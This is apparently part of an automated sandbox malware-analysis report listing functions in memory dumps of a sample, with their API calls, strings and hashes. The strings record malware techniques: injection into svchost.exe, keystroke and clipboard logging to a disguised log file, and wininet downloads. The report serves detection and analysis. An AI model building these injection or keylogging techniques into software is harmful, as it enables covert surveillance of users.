                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: Virtual$AllocFree
                          • String ID:
                          • API String ID: 2087232378-0
                          • Opcode ID: 55e2e7680265c973ffa1402e91b46b56024d44e698dc05e421f391570d180b39
                          • Instruction ID: 70c5c53efbc893b8d49f2abac35e41e0b1b95536ba011f99470416a051eb731c
                          • Opcode Fuzzy Hash: 55e2e7680265c973ffa1402e91b46b56024d44e698dc05e421f391570d180b39
                          • Instruction Fuzzy Hash: 3E217130618A494FEB84EF6DD444765B3F1FB98305F58866EE44AD3244D734DDC28B81
                          Function 000001CFB9601140 Relevance: 2.6, APIs: 2, Instructions: 62memoryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$AllocFree
                          • String ID:
                          • API String ID: 2087232378-0
                          • Opcode ID: 8303c3e4668dae72bfe50a81cfd7d80abcd5397e62f95a8cd0872008db4cf539
                          • Instruction ID: c6fe33e61a90b1336228a6e023063dabb7ff9e7188378c74ed4e9ecaff684196
                          • Opcode Fuzzy Hash: 8303c3e4668dae72bfe50a81cfd7d80abcd5397e62f95a8cd0872008db4cf539
                          • Instruction Fuzzy Hash: A8218332714A8187E748DB2AE580B59B3B3F749B80F548539EA5993748DF34DDE38B40
                          Function 000001CFB9601080 Relevance: 2.6, APIs: 2, Instructions: 53memoryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$AllocFree
                          • String ID:
                          • API String ID: 2087232378-0
                          • Opcode ID: 589145581fe8846709afbff4a435c03ae035fa6c44f0b84fefac36e8fb5e0a43
                          • Instruction ID: 86042e8100e1eedfeab8f6b85577f5162412265ebc5a22697d7d922842995e1f
                          • Opcode Fuzzy Hash: 589145581fe8846709afbff4a435c03ae035fa6c44f0b84fefac36e8fb5e0a43
                          • Instruction Fuzzy Hash: 83118131714A8586E758DB26E580B59B3B7E794BC4F14C129DA4A83758EF38CA92CB40
                          Function 00007FF6F6083710 Relevance: 1.6, APIs: 1, Instructions: 103COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4113640461.00007FF6F6081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6F6080000, based on PE: true
                          • Associated: 00000000.00000002.4113613717.00007FF6F6080000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.4113640461.00007FF6F6089000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.4113640461.00007FF6F6362000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.4113640461.00007FF6F636B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.4113640461.00007FF6F679E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff6f6080000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: Concurrency::cancel_current_task
                          • String ID:
                          • API String ID: 118556049-0
                          • Opcode ID: edba40cea0880d194ebaa201299cea23ff4f6bb981d96338f85a74e8e429ba8b
                          • Instruction ID: 406317de8859bf8aa0a375d4802514331fc3c0db9d7a5c88e96fab3b67910fb8
                          • Opcode Fuzzy Hash: edba40cea0880d194ebaa201299cea23ff4f6bb981d96338f85a74e8e429ba8b
                          • Instruction Fuzzy Hash: D9319372619B8681EB28DAB5D20427DA359BB84BE0F684635CBBD877E5EE7DD041C300
                          Function 000001CFB9393B10 Relevance: 1.6, APIs: 1, Instructions: 101networkCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: send
                          • String ID:
                          • API String ID: 2809346765-0
                          • Opcode ID: 993fe9fb8bd5cda1ffd7d49de116850fd78509aad300088003f3a940471f662b
                          • Instruction ID: a7ebbacc9f6db5956069daf4d990a87c24feab5731e023f3e26cf590659b3ac6
                          • Opcode Fuzzy Hash: 993fe9fb8bd5cda1ffd7d49de116850fd78509aad300088003f3a940471f662b
                          • Instruction Fuzzy Hash: E721D67054CA880FE768AA28D8467B933E5EB85314F28113DE99FC3192E770DD534686
                          Function 000001CFB93937E0 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: Sleep
                          • String ID:
                          • API String ID: 3472027048-0
                          • Opcode ID: 88df6c9814dd7951e769eaa4fec861968935f3fc4ebb5d812e480bd371ef65fc
                          • Instruction ID: 4046ced1bdc44884a1783ac72c7e28a850fba9a1fb220f1c07a4a4b1c361e8d3
                          • Opcode Fuzzy Hash: 88df6c9814dd7951e769eaa4fec861968935f3fc4ebb5d812e480bd371ef65fc
                          • Instruction Fuzzy Hash: B00180706186458FF7989B28D088BA8B7E2FF88305F5C066DE05AC21D1CB74DD86C742
                          Function 000001CFB9393C10 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: Sleep
                          • String ID:
                          • API String ID: 3472027048-0
                          • Opcode ID: bc31317e1241cbe88b87a2fddbfd8f69b2015d3f2dce8f37f5b894eda6bc4ee3
                          • Instruction ID: 10b42ba17488e3b414c7864365416a4ecbdd30ee14c620697ce26bd59c9482f1
                          • Opcode Fuzzy Hash: bc31317e1241cbe88b87a2fddbfd8f69b2015d3f2dce8f37f5b894eda6bc4ee3
                          • Instruction Fuzzy Hash: DFF03A302109048FEB48EF79D8986A037A1FB9D322F548365A97ACA2F5CB754881CB55
                          Function 000001CFB9399EC8 Relevance: 1.5, APIs: 1, Instructions: 28memoryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: CreateHeap
                          • String ID:
                          • API String ID: 10892065-0
                          • Opcode ID: 548033a4c8ebb5abcb3e3bdf629b7b62b8a0c9b1179596de6b3cb96c9a1ceea0
                          • Instruction ID: 046c8ed7c50a47ea4ff79a0b177faaf496b88432cad583347e7f3cbbe5648b82
                          • Opcode Fuzzy Hash: 548033a4c8ebb5abcb3e3bdf629b7b62b8a0c9b1179596de6b3cb96c9a1ceea0
                          • Instruction Fuzzy Hash: 68F065302149844BF788AB28EC5D796B7E5FB88301F848439A94BC2190DF7CC5828745
                          Function 00007FF6F6083910 Relevance: 1.5, APIs: 1, Instructions: 21COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4113640461.00007FF6F6081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6F6080000, based on PE: true
                          • Associated: 00000000.00000002.4113613717.00007FF6F6080000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.4113640461.00007FF6F6089000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.4113640461.00007FF6F6362000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.4113640461.00007FF6F636B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.4113640461.00007FF6F679E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff6f6080000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: Concurrency::cancel_current_task
                          • String ID:
                          • API String ID: 118556049-0
                          • Opcode ID: d025a0e1d41393ba07662206550253d192c19e5506cd72aa5c0ac771977cc478
                          • Instruction ID: eb8ee943d22e061f1d3bf1554c1c4d78764553fdb5acf73dc59d3013769754b3
                          • Opcode Fuzzy Hash: d025a0e1d41393ba07662206550253d192c19e5506cd72aa5c0ac771977cc478
                          • Instruction Fuzzy Hash: 05E0EC50E4D10701FF5CA6B226160B5014C8FA8770E3C2B30DABD842E7BE1EA4578211
                          Function 000001CFB9399430 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: ExitThreadUser_getptd
                          • String ID:
                          • API String ID: 4236301427-0
                          • Opcode ID: 6728eb8ad14789e92f053a9f08787bb6a57bfc41c8639fd74269a17bdb9f7047
                          • Instruction ID: a94892f993fe48435e3ca417aa72f8abfdd1a8da4a2fcde3edb60c33438706d0
                          • Opcode Fuzzy Hash: 6728eb8ad14789e92f053a9f08787bb6a57bfc41c8639fd74269a17bdb9f7047
                          • Instruction Fuzzy Hash: 1DD0C930AC25444BEE48B374C46AFE833A69F85300F9E10B8A40AC3293DE5E8D568201
                          Function 000001CFB9612224 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitThread_amsg_exit_getptd
                          • String ID:
                          • API String ID: 449628364-0
                          • Opcode ID: 89516202c857e40fa39cb306dfbb3384337f535eef88643803fa67fb2fa8daaf
                          • Instruction ID: 9ee064bfd5edd72a387d6a4d227816b1243b13d64d2dd430af621ed601a2e1b8
                          • Opcode Fuzzy Hash: 89516202c857e40fa39cb306dfbb3384337f535eef88643803fa67fb2fa8daaf
                          • Instruction Fuzzy Hash: 47C01225F8219141FA047771C456BEC0173D7D6704F41A878911983383CE18CA575204
                          Function 000001CFB9393860 Relevance: 1.5, APIs: 1, Instructions: 239memoryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: b683d88442267f3b298fb07b97a96996fc05f56e0573c8ee7c1cfc654371a48f
                          • Instruction ID: 0a74d5b798dcd2ec460037c16781f4b4271bdb92d0ff039a08bb239caa64735f
                          • Opcode Fuzzy Hash: b683d88442267f3b298fb07b97a96996fc05f56e0573c8ee7c1cfc654371a48f
                          • Instruction Fuzzy Hash: F0814E30618E459FE788EB38C445BA5B7E2FF94300F68822DE45EC3255DB34E996CB81

                          Non-executed Functions

                          Function 000001CFB9608E20 Relevance: 59.7, APIs: 25, Strings: 9, Instructions: 202libraryloaderprocessCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$AddressLibraryLoadProc$AllocCreateCurrentDirectoryFileMemoryModuleNameOpenSystemVirtualWrite
                          • String ID: %s%s$@$ExitProcess$Kernel32.dll$OpenProcess$WaitForSingleObject$WinExec$Windows\System32\svchost.exe$h
                          • API String ID: 675209239-4110464286
                          • Opcode ID: a97d71568bbf18846906c7cfef66eb8c9853d60e9d6f82541070b3eacffee3a6
                          • Instruction ID: 85a423d3aaceaa8422246715a44bb840864974586e7bbc4fccb6f9f967d75bdb
                          • Opcode Fuzzy Hash: a97d71568bbf18846906c7cfef66eb8c9853d60e9d6f82541070b3eacffee3a6
                          • Instruction Fuzzy Hash: A2A11A31254BC685FB20DB25E854BD973B7FB99B88F804029DA890BB59DF79CB46C700
                          Function 000001CFB96111E0 Relevance: 51.0, APIs: 18, Strings: 11, Instructions: 223stringclipboardsleepCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlenwsprintf$ClipboardGlobal$CountTick$CloseDataLockOpenSizeSleepStateUnlock
                          • String ID: [$%s%s$%s%s$%s%s$)$)$5$5$9$[esc]$f
                          • API String ID: 4137050888-2084089848
                          • Opcode ID: be78bd541a2a61736a1957c595b8d8e79a2c05db90525e976eabeae237735a03
                          • Instruction ID: 7dd3f5515ca23fcaffca9b243d6a14844b4602d13a1a165880693969f67d325f
                          • Opcode Fuzzy Hash: be78bd541a2a61736a1957c595b8d8e79a2c05db90525e976eabeae237735a03
                          • Instruction Fuzzy Hash: 71A16931284AD286FB509F25E844BE933B7F745B84F45A03ED94A966A9DB38CF47C700
                          Function 000001CFB961B734 Relevance: 44.2, APIs: 24, Strings: 1, Instructions: 465COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: __doserrno_errno_invalid_parameter_noinfo
                          • String ID: U
                          • API String ID: 3902385426-4171548499
                          • Opcode ID: 14832583135990958cc041f7d1495fdaf62a60cf093e4a4757440e2763ab6bc2
                          • Instruction ID: 24ad976c5e646cb39c4f51d7a9f8330210c653ab481a03cc82e9a13acb53be81
                          • Opcode Fuzzy Hash: 14832583135990958cc041f7d1495fdaf62a60cf093e4a4757440e2763ab6bc2
                          • Instruction Fuzzy Hash: 9812E1322446E686FB609F35D044BEA67B3F784B84F54613EDA49477A8DB39CE46CB00
                          Function 000001CFB9617E34 Relevance: 32.2, APIs: 16, Strings: 2, Instructions: 721COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: write_multi_char$_errno_invalid_parameter_noinfowrite_char$_fileno_getptdfree
                          • String ID: $@
                          • API String ID: 1084558760-1077428164
                          • Opcode ID: b93bcdadbb8f90328ffe307164794086ab09e7f1a399fbb678084070f32f958e
                          • Instruction ID: 73fa0917c5afee175fb32811dab56f8eba0fdd467c0bc25091bf066aef31f69d
                          • Opcode Fuzzy Hash: b93bcdadbb8f90328ffe307164794086ab09e7f1a399fbb678084070f32f958e
                          • Instruction Fuzzy Hash: 445215325886E28AFB658B55D544BEE6BB3F785788F24203DDA45476E4CB38CE43CB40
                          Function 000001CFB96150CC Relevance: 32.2, APIs: 16, Strings: 2, Instructions: 705COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: write_multi_char$_errno_invalid_parameter_noinfowrite_char$_fileno_getptdfree
                          • String ID: $@
                          • API String ID: 1084558760-1077428164
                          • Opcode ID: 0dd8a9e9680b45a2330683c2a2ed1dce40d136c4451b1250229d276cd2c77d16
                          • Instruction ID: ec0a05dae091c906adf1a0cdae9a76cc3ba7956eb840e790f17444c3cdd06b3b
                          • Opcode Fuzzy Hash: 0dd8a9e9680b45a2330683c2a2ed1dce40d136c4451b1250229d276cd2c77d16
                          • Instruction Fuzzy Hash: D552F2726986F286FB658B15D544BEEABB3F741788F14203EDA46476E4D738CE42C700
                          Function 000001CFB96093C0 Relevance: 29.9, APIs: 11, Strings: 6, Instructions: 123libraryloaderfileCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$Library$FileFree$CloseCreateHandleLoadSleepWrite
                          • String ID: InternetCloseHandle$InternetOpenUrlW$InternetOpenW$InternetReadFile$MSIE 6.0$wininet.dll
                          • API String ID: 2977986460-1099148085
                          • Opcode ID: 122a2b6eb11c11a15bde66c07e659a8e57f10cad457793a664417ab65b661b38
                          • Instruction ID: 5fa4246247063add3adf83713b71ae48477022200a057868c28b4e300390aa36
                          • Opcode Fuzzy Hash: 122a2b6eb11c11a15bde66c07e659a8e57f10cad457793a664417ab65b661b38
                          • Instruction Fuzzy Hash: 79418431645AC282FB60AF16F954BAA73B3F789B94F4441399D4907B95DF3CCA468B00
                          Function 000001CFB9610DD0 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 121synchronizationfilekeyboardCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateFile$Mutex$CloseCountDeleteDirectFolderHandleInput8ObjectPathReleaseSingleSizeStateTickWaitlstrcat
                          • String ID: <$\DisplaySessionContainers.log
                          • API String ID: 1095970075-1170057892
                          • Opcode ID: 284f6281b173ea0aff20379d17f905d139eb7f03b249c409d53b4416046c541a
                          • Instruction ID: dbfc4b7b3c9ef6ff96ca35e5dd90a2d8d61807bf646b0271c7f328e31556da0b
                          • Opcode Fuzzy Hash: 284f6281b173ea0aff20379d17f905d139eb7f03b249c409d53b4416046c541a
                          • Instruction Fuzzy Hash: 24513C31644AC686FB10AF26E855BCA3773F795B88F50502EDE4947765CF3ACA4ACB00
                          Function 000001CFB960E660 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 143stringprocessCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcatlstrlen$CreateEnvironmentExpandProcessStringslstrcpywsprintf
                          • String ID: $"%1$%s\shell\open\command$WinSta0\Default$h
                          • API String ID: 1783372451-2159495357
                          • Opcode ID: ba43ab3c16d950af868a15ba6c4eacb985eb0009e768881ed9b92db806f5a03d
                          • Instruction ID: 2109d14f0e14af5c2c44f7323680302970c3eb4bd82cd6f2051387c2c9fde9aa
                          • Opcode Fuzzy Hash: ba43ab3c16d950af868a15ba6c4eacb985eb0009e768881ed9b92db806f5a03d
                          • Instruction Fuzzy Hash: 5C619132350AD695FB20DB61D894BDD77B7FB88748F840039DA0946A99EF78CB46C700
                          Function 000001CFB95CB205 Relevance: 21.7, APIs: 11, Strings: 1, Instructions: 704COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: __doserrno_errno_invalid_parameter_noinfo
                          • String ID: U
                          • API String ID: 3902385426-4171548499
                          • Opcode ID: 5aec5120c6578ec051baed5e0ed66375258b5a76272eb916c6a446832dd0d25f
                          • Instruction ID: e1de1345efa5c9a4535e208819806d5f771e4bedad6fae1f0c847cda27d06e81
                          • Opcode Fuzzy Hash: 5aec5120c6578ec051baed5e0ed66375258b5a76272eb916c6a446832dd0d25f
                          • Instruction Fuzzy Hash: 2632D232698A898BF7199F68D945BEA73F2FB85300F14052DE4C6C3591DB35DD83CA82
                          Function 000001CFB939E1C0 Relevance: 21.7, APIs: 11, Strings: 1, Instructions: 704COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: __doserrno_errno_invalid_parameter_noinfo
                          • String ID: U
                          • API String ID: 3902385426-4171548499
                          • Opcode ID: 1e763b87e58c8dc672522dd8e0167707f509b774740b5ce60d3588ef98fcd1fe
                          • Instruction ID: eb6c3981337b75b2d34bae6ab7d1f8eb54d825ffd6b0be8b99386e9e49327178
                          • Opcode Fuzzy Hash: 1e763b87e58c8dc672522dd8e0167707f509b774740b5ce60d3588ef98fcd1fe
                          • Instruction Fuzzy Hash: D332C131158A848BF729AB58D845BEA7BF6FF95700F2C052DE887C7192DB34DD438682
                          Function 000001CFB961987C Relevance: 20.3, APIs: 13, Instructions: 753COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: DecodePointerwrite_multi_char$_errno_invalid_parameter_noinfo$_getptdfreewrite_char
                          • String ID:
                          • API String ID: 3562693915-0
                          • Opcode ID: 0a0d01e0bc9ea0a1bd05f23eeabc50ec017c538580942d0fdee960967a9280e8
                          • Instruction ID: 2188b11387577811314e01271e4e38a227b9ddcf5751a7604c6d04e8e9e9483f
                          • Opcode Fuzzy Hash: 0a0d01e0bc9ea0a1bd05f23eeabc50ec017c538580942d0fdee960967a9280e8
                          • Instruction Fuzzy Hash: F96206726486E286FB248B15E440BEE66B3FB81784F25603EDB46877D5DB79CE42C700
                          Function 000001CFB960E8D0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 138registrystringCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close$OpenQueryValuelstrcpy
                          • String ID: %08X
                          • API String ID: 2032971926-3773563069
                          • Opcode ID: 0e29cbce6a932c9d2b64313da98afed9452b15b340385b79296a8b5820efe7fb
                          • Instruction ID: e52008a78bffc30530f62ec27e2fc4207d0de835b3c5b2228b576d8db9674353
                          • Opcode Fuzzy Hash: 0e29cbce6a932c9d2b64313da98afed9452b15b340385b79296a8b5820efe7fb
                          • Instruction Fuzzy Hash: D7515631354AD182F760DB15E4C4BDAB773F784794F80513AEA8A43A98DF38CA46CB04
                          Function 000001CFB96095B0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 102threadinjectionprocessCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Thread$ContextProcess$AllocCreateDirectoryMemoryResumeSystemVirtualWrite
                          • String ID: %s%s$@$Windows\System32\svchost.exe$h
                          • API String ID: 4033188109-2160973000
                          • Opcode ID: f58d6a7c057cb02c2df6b1a71c3067792be07cb7426ee7cce939de0eded3e3e7
                          • Instruction ID: 496e3f1693be05049cc2f93c3b2adfda78b2cfeb62ebd26ecd1ef74c0506e57b
                          • Opcode Fuzzy Hash: f58d6a7c057cb02c2df6b1a71c3067792be07cb7426ee7cce939de0eded3e3e7
